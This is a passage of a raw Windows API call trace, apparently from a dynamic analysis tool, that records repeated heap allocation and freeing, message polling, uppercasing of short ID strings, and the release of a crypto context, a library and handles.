Size=0x8) returned 0x24b1868 [0206.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.345] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0206.345] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.346] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.346] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.346] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.346] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.346] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0206.346] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.353] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0206.353] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0206.353] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.353] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.353] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.353] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.353] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.353] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0206.353] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.353] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0206.353] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.353] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.353] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0206.353] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.354] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0206.354] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.354] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.354] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.354] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.354] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.354] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.354] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.354] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.354] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.354] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.354] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.354] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.354] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.354] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.354] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.355] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0206.355] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.355] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0206.355] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.355] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.362] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.363] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0206.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0206.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0206.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0206.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0206.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0206.364] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.364] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0206.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.365] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.365] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0206.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0206.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.365] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0206.365] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0206.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0206.366] FreeLibrary (hLibModule=0x74d40000) returned 1 [0206.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.366] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.366] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0206.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.366] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0206.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0206.367] CloseHandle (hObject=0x268) returned 1 [0206.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0206.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0206.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0206.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0206.368] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0206.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0206.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0206.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0206.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0206.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0206.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0206.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0206.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.370] CloseHandle (hObject=0x1f8) returned 1 [0206.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0206.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0206.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0206.379] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0206.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0206.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0206.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: 